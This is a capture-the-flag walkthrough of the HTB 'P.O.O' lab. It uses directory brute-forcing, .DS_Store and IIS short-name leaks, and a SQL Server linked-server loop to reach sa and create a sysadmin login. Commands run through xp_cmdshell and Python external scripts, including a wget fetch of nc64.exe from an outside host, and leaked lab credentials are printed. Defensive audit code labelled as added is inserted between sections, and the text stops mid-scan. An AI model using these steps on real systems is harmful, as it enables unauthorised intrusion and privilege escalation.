Endgame P.O.O
2022-06-24 09:41:00 【Little mo and his】
Recon
First, sweep the target with nmap.
└─$ sudo nmap -sS -sV -sC 10.13.38.11
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
|_ssl-date: 2022-06-21T01:44:22+00:00; +4s from scanner time.
| ms-sql-ntlm-info:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-19T02:28:12
|_Not valid after: 2052-06-19T02:28:12
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 10.13.38.11:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
The sweep turned up two services: IIS on port 80 and SQL Server on port 1433, so there is a web service and a database service. Visiting the main page shows only the default IIS landing page, with nothing of interest, so the next step is to look for other entry points by brute-forcing directories.
└─$ gobuster dir -u http://10.13.38.11 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -t 50
===============================================================
/plugins (Status: 301) [Size: 150] [--> http://10.13.38.11/plugins/]
/themes (Status: 301) [Size: 149] [--> http://10.13.38.11/themes/]
/images (Status: 301) [Size: 149] [--> http://10.13.38.11/images/]
/js (Status: 301) [Size: 145] [--> http://10.13.38.11/js/]
/templates (Status: 301) [Size: 152] [--> http://10.13.38.11/templates/]
/admin (Status: 401) [Size: 1293]
/uploads (Status: 301) [Size: 150] [--> http://10.13.38.11/uploads/]
/dev (Status: 301) [Size: 146] [--> http://10.13.38.11/dev/]
/. (Status: 200) [Size: 703]
/widgets (Status: 301) [Size: 150] [--> http://10.13.38.11/widgets/]
/meta-inf (Status: 301) [Size: 151] [--> http://10.13.38.11/meta-inf/]
/.ds_store (Status: 200) [Size: 10244]
/.trashes (Status: 301) [Size: 151] [--> http://10.13.38.11/.trashes/]
admin and uploads looked the most interesting at first glance, but admin requires authentication and uploads returns Access is denied, so neither of those two directories is usable. I tried all the others and they also returned Access is denied, except /.ds_store, which can be downloaded. Reading up on sensitive files under web sites: .DS_Store is a file mostly seen on Mac OS X. Although this is a Windows host, the site may well have been developed on Mac OS and then deployed to a Windows machine.
It is now clear that this is a sensitive file, and fortunately its format is easy to read; a detailed explanation of the binary structure is in Parsing the .DS_Store file format.
At first the online tools did not tell me much; then I found a few tools:
- Python-dsstore can parse a local .DS_Store file
└─ python main.py /home/kali/Downloads/ds_store
Count: 38
admin
admin
admin
dev
dev
dev
iisstart.htm
Images
Images
Images
JS
JS
JS
META-INF
META-INF
META-INF
New folder
New folder
New folder
New folder (2)
New folder (2)
New folder (2)
Plugins
Plugins
Plugins
Templates
Templates
Templates
Themes
Themes
Themes
Uploads
Uploads
Uploads
web.config
Widgets
Widgets
Widgets
That by itself did not reveal much... Later I learned about this one:
- DS_Walk fetches the site's .DS_Store, parses it with dsstore, and then uses the result to enumerate directories recursively
└─$ python /opt/DS_Walk/ds_walk.py -u http://10.13.38.11/
[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://10.13.38.11//admin
[!] http://10.13.38.11//dev
[!] http://10.13.38.11//iisstart.htm
[!] http://10.13.38.11//Images
[!] http://10.13.38.11//JS
[!] http://10.13.38.11//META-INF
[!] http://10.13.38.11//New folder
[!] http://10.13.38.11//New folder (2)
[!] http://10.13.38.11//Plugins
[!] http://10.13.38.11//Templates
[!] http://10.13.38.11//Themes
[!] http://10.13.38.11//Uploads
[!] http://10.13.38.11//web.config
[!] http://10.13.38.11//Widgets
----------------------------
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11//Images/buttons
[!] http://10.13.38.11//Images/icons
[!] http://10.13.38.11//Images/iisstart.png
----------------------------
[!] http://10.13.38.11//JS/custom
----------------------------
[!] http://10.13.38.11//Themes/default
----------------------------
[!] http://10.13.38.11//Widgets/CalendarEvents
[!] http://10.13.38.11//Widgets/Framework
[!] http://10.13.38.11//Widgets/Menu
[!] http://10.13.38.11//Widgets/Notifications
----------------------------
[!] http://10.13.38.11//Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11//Widgets/Framework/Layouts/custom
[!] http://10.13.38.11//Widgets/Framework/Layouts/default
----------------------------
[*] Finished traversing. No remaining .ds_store files present.
[*] Cleaning up .ds_store files saved to disk.
This gave far more information than gobuster. The two hashes in the directory names crack as md5(mrb3n)=304c0c90fbc6520610abbf378e2339d1 and md5(eks)=dca66d38fd916317687e1390a420c3fc.
Of course, trying to enter these new directories also gives Access is denied, and the two names do not work as a credential pair for the admin directory either. Perhaps they are SQL Server user names?
All we can do is look for other entry points. I came across the IIS short name vulnerability; the most widely cited write-up is Microsoft IIS tilde character “~” Vulnerability/Feature – Short File/Folder Name Disclosure.
This Chinese blog post is easy to follow: IIS Short file name brute force guessing vulnerability analysis. The issue exists because, for compatibility with 16-bit MS-DOS programs, Windows generates a corresponding 8.3 short name for every file (and folder) that has a long file name.
We use the author's tool IIS_shortname_Scanner to enumerate. Through ds_walk we obtained the same four directories for the two users (core, db, include, src), but only db can be scanned, and both db directories should contain the same txt file.
└─$ python2 iis_shortname_Scan.py http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/db
Server is vulnerable, please wait, scanning...
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/p~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/po~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_c~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.t* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.tx* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [scan in progress]
[+] File //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*
----------------------------------------------------------------
└─$ python2 iis_shortname_Scan.py http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/db
----------------------------------------------------------------
File: //dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt*
----------------------------------------------------------------
Obviously poo is the name of the lab, so the key is the part after it, co. Grep the words starting with co out of the dictionary, then prepend poo_ and append .txt.
# write the co... words into fuzz.txt
grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > fuzz.txt
vim fuzz.txt
# run these commands inside vim
# add poo_ at the beginning of each line
:%s/^/poo_
# add .txt at the end of each line
:%s/$/.txt
# Directory enumeration
└─$ gobuster dir -u http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db -w /home/kali/Desktop/fuzz.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
/poo_connection.txt (Status: 200) [Size: 142]
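The wordlist trick above works because the scanner leaks the 8.3 form of a long file name. The following added example (not from the page or its tools) implements a simplified version of the NTFS 8.3 generation rules so a defender can see which long names under a web root would be recognisable from such a leak; the wordlist and the exact short-name algorithm are assumptions (Windows' real algorithm has more cases, e.g. hash-based tails after several collisions).

```python
import re

# Characters NTFS keeps in an 8.3 name; anything else is replaced by "_".
_NOT_ALLOWED = re.compile(r"[^A-Z0-9$%'\-_@~`!(){}^#&]")


def short_name(long_name: str, seq: int = 1) -> str:
    """Approximate the NTFS-generated 8.3 name of a long file name.

    Simplified rules (assumption: the common case with a numeric ~seq tail):
    spaces and embedded periods are dropped, the name is upper-cased,
    characters outside the 8.3 alphabet become "_", and a name that still
    does not fit 8.3 is cut to six characters plus "~seq", with the
    extension cut to three characters.
    """
    stem, dot, ext = long_name.rpartition(".")
    if not dot or not stem.strip("."):      # no extension, or a dot-file like .DS_Store
        stem, ext = long_name, ""
    stem = _NOT_ALLOWED.sub("_", stem.replace(" ", "").replace(".", "").upper())
    ext = _NOT_ALLOWED.sub("_", ext.replace(" ", "").upper())
    canonical = f"{stem}.{ext}" if ext else stem
    if len(stem) <= 8 and len(ext) <= 3 and canonical == long_name.upper():
        return canonical                    # already a valid 8.3 name: no tilde name is generated
    short = f"{stem[:6]}~{seq}"
    return f"{short}.{ext[:3]}" if ext else short


def discoverable(long_names, observed_short: str):
    """Long names whose 8.3 form matches what a tilde scanner reported.

    The scanner prints a trailing "*" because it only confirms the first
    three extension characters; the comparison is case-insensitive.
    """
    target = observed_short.rstrip("*").upper()
    return [n for n in long_names if short_name(n) == target]


# Constructed wordlist standing in for the grep "^co" candidates used on the page.
SAMPLE_WORDS = ["poo_connection.txt", "poo_config.txt", "poo_cat.txt",
                "poo_container.txt", "config.txt", "poo_co.txt"]

if __name__ == "__main__":
    for name in ["poo_connection.txt", "web.config", "iisstart.htm", ".ds_store", "New folder (2)"]:
        print(f"{name:20} -> {short_name(name)}")
    print("matches poo_co~1.txt*:", discoverable(SAMPLE_WORDS, "poo_co~1.txt*"))
```

Note that poo_cat.txt and poo_co.txt are excluded: a tilde name is only generated when the long name does not already fit 8.3, which is itself information the leak gives away. On the server side, `fsutil 8dot3name set 1` stops new short names from being created (existing ones remain until stripped), and the tilde requests themselves are easy to spot in IIS logs.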
Finally got it. Let's see whether it can be opened. Going by the directory and file name it should be the database configuration file; I hope so.
└─$ curl http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_connection.txt
SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#
Flag : POO{fcfb0****************5011ad555}
Not only the database credentials, but this section's flag as well.
Huh?!
Careless: I connected with mssqlclient.py and it failed. Only after checking the walkthrough did I see that the two # characters before and after the password have to be included.
└─$ mssqlclient.py external_user:#p00Public3xt3rnalUs3r#@10.13.38.11
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
SQL>
First try 1433 - Pentesting MSSQL - Microsoft SQL Server - HackTricks to see if there is a way to escalate privileges.
Sure enough, we are not sysadmin, so nothing works directly:
SQL> SELECT is_srvrolemember('sysadmin');
-----------
0
Then from the walkthrough I learned that SQL Server has a database link feature. Linked databases can execute SQL on each other, which is a perfectly normal feature, but a misconfiguration lets us gain privileges. Let's first look at the users on this database.
SQL> SELECT name FROM master..syslogins
name
-------------------
sa
external_user
SQL> SELECT name FROM master..syslogins WHERE sysadmin = '1';
name
---------------------------------------
sa
This database has two users: the administrator sa and plain old me, external_user. Even as an ordinary user, let's see what permissions we have; the result is simply ordinary.
SQL> SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');
entity_name permission_name
------------- --------------------
server CONNECT SQL
SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! is the first article I found on this subject. I did not find it very clear, but it makes two points:
- If a link is enabled (data access is set to 1), then every user on the database server can use the link, regardless of that user's permissions (public or sysadmin makes no difference)
- If the link is configured to use a SQL account, then every account connecting to the destination database gets that account's permissions on the destination. In other words, a public user on server A may execute SQL queries on server B as sysadmin.
Are you using Linked Servers? They may be in serious danger! explains how a wrong configuration makes the linked user sysadmin. MSSQL for Pentester: Abusing Linked Database explains how to exploit this with metasploit and PowerUpSQL.
View the current host:
SQL> select @@servername
--------------------------
COMPATIBILITY\POO_PUBLIC
Check whether there is a linked host:
SQL> select srvname from sysservers;
srvname
------------------------------
COMPATIBILITY\POO_CONFIG
COMPATIBILITY\POO_PUBLIC
We are linked to another host, COMPATIBILITY\POO_CONFIG.
Send it a request and see; as described in the article, it returns an error:
SQL> select version from openquery("linkedserver", 'select @@version as version');
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 1: Could not find server 'linkedserver' in sys.servers. Verify that the correct server name was specified. If necessary, execute the stored procedure sp_addlinkedserver to add the server to sys.servers.
Fortunately the walkthrough author solved this problem. Request the current server name; the result COMPATIBILITY\POO_CONFIG shows the request succeeded.
SQL> EXECUTE ('select @@servername;') at [COMPATIBILITY\POO_CONFIG];
------------------------------
COMPATIBILITY\POO_CONFIG
View the current user on COMPATIBILITY\POO_CONFIG:
SQL> EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];
------------------------------
internal_user
Also check which users have sysadmin permissions on the COMPATIBILITY\POO_CONFIG database:
SQL> EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];
name
----------------
sa
Still sa. Next we make COMPATIBILITY\POO_CONFIG send a request back to COMPATIBILITY\POO_PUBLIC:
SQL> EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
------------------------------
sa
Something amazing happened: we became sa. This means there is a misconfiguration between the two databases that elevates our permissions. Checking permissions again shows that we have all of them:
SQL> EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
entity_name permission_name
------------------------------ ------------------------------
server CONNECT SQL
server SHUTDOWN
server CREATE ENDPOINT
server CREATE ANY DATABASE
server CREATE AVAILABILITY GROUP
server ALTER ANY LOGIN
server ALTER ANY CREDENTIAL
server ALTER ANY ENDPOINT
server ALTER ANY LINKED SERVER
server ALTER ANY CONNECTION
server ALTER ANY DATABASE
server ALTER RESOURCES
server ALTER SETTINGS
server ALTER TRACE
server ALTER ANY AVAILABILITY GROUP
server ADMINISTER BULK OPERATIONS
server AUTHENTICATE SERVER
server EXTERNAL ACCESS ASSEMBLY
server VIEW ANY DATABASE
server VIEW ANY DEFINITION
server VIEW SERVER STATE
server CREATE DDL EVENT NOTIFICATION
server CREATE TRACE EVENT NOTIFICATION
server ALTER ANY EVENT NOTIFICATION
server ALTER SERVER STATE
server UNSAFE ASSEMBLY
server ALTER ANY SERVER AUDIT
server CREATE SERVER ROLE
server ALTER ANY SERVER ROLE
server ALTER ANY EVENT SESSION
server CONNECT ANY DATABASE
server IMPERSONATE ANY LOGIN
server SELECT ALL USER SECURABLES
server CONTROL SERVER
Then we create a user with sysadmin permissions:
SQL> EXECUTE('EXECUTE(''CREATE LOGIN df WITH PASSWORD = ''''[email protected]#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
SQL> EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''df'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
If the login fails, just wait a minute; it takes a while to take effect.
└─$ mssqlclient.py 'df:[email protected]#@10.13.38.11'
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
# List databases
SQL> SELECT name FROM master..sysdatabases;
name
------------------------------
master
tempdb
model
msdb
POO_PUBLIC
flag
# View the flag database
SQL> select table_name,table_schema from flag.INFORMATION_SCHEMA.TABLES;
table_name table_schema
------------------------------ ------------------------------
flag dbo
# Query the flag table
SQL> select * from flag.dbo.flag;
flag
----------------------------------------
b'POO{88d829eb************************}'
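The escalation in this section rests on a linked-server login mapping that hands every local login a fixed remote account, plus the server options (xp_cmdshell, external scripts) that are abused in the next section. The following added example (not the page's code or any vendor tool) is the audit a DBA would run over the catalog views sys.servers, sys.linked_logins and sys.configurations; the rows are constructed to mirror the COMPATIBILITY\POO_PUBLIC instance, and the thresholds and severities are assumptions.

```python
from dataclasses import dataclass
from typing import Optional

# A row of:  SELECT s.name, s.is_linked, s.is_data_access_enabled, s.is_rpc_out_enabled,
#                   l.local_principal_id, l.uses_self_credential, l.remote_name
#            FROM sys.servers s LEFT JOIN sys.linked_logins l ON l.server_id = s.server_id;
@dataclass(frozen=True)
class LinkRow:
    name: str
    is_linked: bool
    is_data_access_enabled: bool     # OPENQUERY / four-part names allowed
    is_rpc_out_enabled: bool         # EXECUTE (...) AT [server] allowed
    local_principal_id: int          # 0 = this mapping applies to every local login
    uses_self_credential: bool       # True = remote side sees the caller's own identity
    remote_name: Optional[str]       # fixed remote login when uses_self_credential is False


# Constructed sample: POO_PUBLIC links to POO_CONFIG with a fixed SQL login that
# every local login may use, which is exactly what let external_user become sa.
SAMPLE_ROWS = [
    LinkRow("COMPATIBILITY\\POO_PUBLIC", False, True, True, 0, True, None),     # the local server itself
    LinkRow("COMPATIBILITY\\POO_CONFIG", True, True, True, 0, False, "internal_user"),
    LinkRow("REPORTS", True, False, False, 0, False, "svc_reports"),            # unusable: both disabled
    LinkRow("ARCHIVE", True, True, False, 0, True, None),                        # caller's identity: fine
]

# Constructed sys.configurations snapshot: name -> value_in_use.
SAMPLE_CONFIG = {"xp_cmdshell": 1, "external scripts enabled": 1,
                 "Ole Automation Procedures": 0, "clr enabled": 0}

# Options that turn database access into OS command execution.
DANGEROUS_OPTIONS = ("xp_cmdshell", "external scripts enabled",
                     "Ole Automation Procedures", "clr enabled")


def audit_links(rows):
    """Flag links whose fixed remote login is reachable by local logins."""
    findings = []
    for r in rows:
        if not r.is_linked or r.uses_self_credential or r.remote_name is None:
            continue
        if not (r.is_data_access_enabled or r.is_rpc_out_enabled):
            continue                             # link cannot be queried at all
        everyone = r.local_principal_id == 0
        who = "every local login" if everyone else f"principal {r.local_principal_id}"
        reason = f"fixed remote login {r.remote_name!r} usable by {who}"
        if r.is_rpc_out_enabled:
            reason += "; 'rpc out' permits EXECUTE ... AT"
        findings.append({
            "server": r.name,
            "severity": "high" if everyone else "medium",
            "reason": reason,
            # Restore the caller's own identity on the remote side and drop RPC Out.
            "fix": [f"EXEC sp_addlinkedsrvlogin @rmtsrvname = N'{r.name}', @useself = 'TRUE';",
                    f"EXEC sp_serveroption N'{r.name}', 'rpc out', 'false';"],
        })
    return findings


def audit_options(config):
    """Return (option, remediation) for each dangerous option that is on."""
    return [(name, f"EXEC sp_configure '{name}', 0; RECONFIGURE;")
            for name in DANGEROUS_OPTIONS if config.get(name, 0)]


if __name__ == "__main__":
    for f in audit_links(SAMPLE_ROWS):
        print(f["severity"], f["server"], "-", f["reason"])
        for stmt in f["fix"]:
            print("   ", stmt)
    for name, stmt in audit_options(SAMPLE_CONFIG):
        print("enabled:", name, "->", stmt)
```

After changing a mapping, the check the page itself uses, `EXECUTE ('SELECT suser_name();') AT [link]`, run as a low-privileged login, should no longer come back as sa or another privileged fixed account. Note that the remote side of a link can also be a misconfigured path back to the same server, which is the loop exploited above.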
BackTrack
This time we have sysadmin, so, as in STARTING POINT TIER 2 Archetype, the idea is to run PowerShell through xp_cmdshell and then fetch nc64.exe.
# View the current user
SQL> xp_cmdshell "powershell -c whoami"
output
----------------------------------
nt service\mssql$poo_public
# Enter the current directory and upload the file
SQL> xp_cmdshell "powershell -c cd C:\Users\MSSQL`$POO_PUBLIC\Downloads; wget http://10.10.17.21/nc64.exe -outfile nc64.exe"
output
-----------------------------------------------------
wget : Unable to connect to the remote server
# The result: no outbound network access, so nothing comes of it
SQL> xp_cmdshell "powershell -c ping 10.10.17.21"
output
----------------------------------------------------------
Pinging 10.10.17.21 with 32 bytes of data:
Ping statistics for 10.10.17.21:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss)
But here I learned the PowerShell escape character: in PowerShell, $ introduces a variable, so in the user name MSSQL$POO_PUBLIC the part $POO_PUBLIC would be treated as a variable. The backtick ` escapes it, hence MSSQL`$POO_PUBLIC.
Test connectivity before uploading files in future, otherwise it is wasted effort.
So I can only look at the file system first.
SQL> xp_cmdshell "powershell cd C://; ls"
output
------------------------------------------------------------------------
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/13/2019 3:58 AM inetpub
d----- 9/15/2018 10:19 AM PerfLogs
d-r--- 12/12/2019 7:35 PM Program Files
d----- 12/13/2019 4:01 AM Program Files (x86)
d-r--- 12/12/2019 6:02 PM Users
d----- 11/25/2021 9:36 PM Windows
-a---- 6/19/2022 12:35 PM 165593 PowerView.ps1
inetpub is the IIS server directory. web.config is in it, but the current account does not have permission to view it:
SQL> xp_cmdshell "powershell type C:\inetpub\wwwroot\web.config;"
------------------------------------------------------------------------
type : Access to the path 'C:\inetpub\wwwroot\web.config' is denied.
I learned that SQL Server can be extended with external scripts, and that it can be configured to run those scripts as another user.
How to run Python scripts in SQL Server 2017: SQL Server 2017 - Python Executing Inside SQL Server
SQL> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
compatibility\poo_public01
As a result we became the poo_public01 user, and that user can view the web.config file:
SQL> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("type C:\inetpub\wwwroot\web.config");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<staticContent>
<mimeMap
fileExtension=".DS_Store"
mimeType="application/octet-stream"
/>
</staticContent>
<!--
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user
name="Administrator"
password="EverybodyWantsToWorkAtP.O.O."
/>
</credentials>
</forms>
</authentication>
-->
</system.webServer>
</configuration>
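Two findings on this page live in this one file: the mimeMap that made .DS_Store downloadable (IIS's static file handler answers 404.3 for extensions without a MIME mapping, so the mapping is what exposed the file), and administrator credentials left inside an XML comment. The following added example (not from the page or from IIS) audits a web.config for both; the sample is the page's web.config embedded inline with the password redacted, the artefact extension list is an assumption, and comments are kept during parsing with the standard library's TreeBuilder(insert_comments=True).

```python
import re
import xml.etree.ElementTree as ET

# Extensions that belong to development tooling or backups, never to a
# published site; a mimeMap for any of them makes such files downloadable.
ARTEFACT_EXTENSIONS = {".ds_store", ".git", ".svn", ".bak", ".old", ".env", ".sql", ".ps1"}

# Constructed sample: the web.config recovered on this page, password redacted.
SAMPLE_WEB_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <staticContent>
      <mimeMap fileExtension=".DS_Store" mimeType="application/octet-stream" />
    </staticContent>
    <!--
    <authentication mode="Forms">
      <forms name="login" loginUrl="/admin">
        <credentials passwordFormat = "Clear">
          <user name="Administrator" password="REDACTED" />
        </credentials>
      </forms>
    </authentication>
    -->
  </system.webServer>
</configuration>
"""


def _parse_keeping_comments(xml_text: str) -> ET.Element:
    """Parse XML but keep <!-- --> comments as elements whose tag is ET.Comment."""
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    return ET.fromstring(xml_text.encode("utf-8"), parser=parser)


def _credential_users(node):
    """Yield (passwordFormat, user name) for every <credentials><user> below node."""
    for cred in node.iter("credentials"):
        fmt = cred.get("passwordFormat", "")
        for user in cred.iter("user"):
            yield fmt, user.get("name", "?")


def audit_web_config(xml_text: str):
    """Return (kind, subject, detail) findings for exposure-relevant settings."""
    root = _parse_keeping_comments(xml_text)
    findings = []

    for mime in root.iter("mimeMap"):
        ext = mime.get("fileExtension", "")
        if ext.lower() in ARTEFACT_EXTENSIONS:
            findings.append(("mimeMap-exposes-artefact", ext,
                             "remove the mapping; unmapped extensions are not served (404.3)"))

    # Credentials in the live configuration.
    for fmt, name in _credential_users(root):
        findings.append(("cleartext-credential", name, f"live <credentials passwordFormat={fmt!r}>"))

    # Credentials that were merely commented out still ship with the file.
    for node in root.iter():
        if node.tag is not ET.Comment:
            continue
        body = node.text or ""
        try:
            fragment = ET.fromstring(f"<wrapper>{body}</wrapper>")
        except ET.ParseError:
            if re.search(r"password\s*=", body, re.I):   # not XML: fall back to a text search
                findings.append(("cleartext-credential", "<unparsed comment>", "password= inside a comment"))
            continue
        for fmt, name in _credential_users(fragment):
            findings.append(("cleartext-credential", name,
                             f"inside an XML comment (passwordFormat={fmt!r}); still readable by anyone who gets the file"))
    return findings


if __name__ == "__main__":
    for kind, subject, detail in audit_web_config(SAMPLE_WEB_CONFIG):
        print(f"{kind}: {subject} - {detail}")
```

The same parse-with-comments approach applies to any configuration format that tolerates comments: a secret that was "disabled" by commenting it out is still a secret on disk, and here the file was readable because a sysadmin-level database login could run code as a second OS account.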
We have the account and password; just enter them at http://10.13.38.11/admin/.
Foothold
The previous part obtained the IIS server credentials, so the idea now is to find a remote-access service. Since we are currently the database administrator, list which ports have services listening, and then look at the IP addresses.
SQL> EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("netstat -ano");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 916
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 4684
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:41433 0.0.0.0:0 LISTENING 4692
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 492
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1168
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1672
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
UDP [::]:123 *:* 760
UDP [::]:500 *:* 2560
UDP [::]:1434 *:* 2792
UDP [::]:3702 *:* 2464
UDP [::]:3702 *:* 2464
UDP [::]:4500 *:* 2560
UDP [::]:5353 *:* 1080
UDP [::]:5355 *:* 1080
UDP [::]:59578 *:* 2464
SQL> EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("ipconfig");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
Windows IP Configuration
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.20.128.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::250
IPv6 Address. . . . . . . . . . . : dead:beef::1001
IPv6 Address. . . . . . . . . . . : dead:beef::6033:f520:ab97:3e4
Link-local IPv6 Address . . . . . : fe80::6033:f520:ab97:3e4%5
IPv4 Address. . . . . . . . . . . : 10.13.38.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : dead:beef::1
fe80::250:56ff:feb9:1f8d%5
10.13.38.2
After a hint from the walkthrough: the remote-access service can only be found by scanning over IPv6. This reminded me of a situation I ran into before, where the remote-access service did not use TCP but UDP, and could only be found with a UDP scan.
Oddly, ipconfig shows three IPv6 addresses, so just scan all of them, and scan over UDP as well.
The results differ, so be suspicious of scan results: when you feel there is no way forward, question the scan and think about what other way you could scan.
└─$ sudo nmap -sS -p 80,135,445,1433,5357,5985,41433,47001,49664,49665,49666 -6 dead:beef::250 --min-rate 10000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 04:15 EDT
Nmap scan report for dead:beef::250
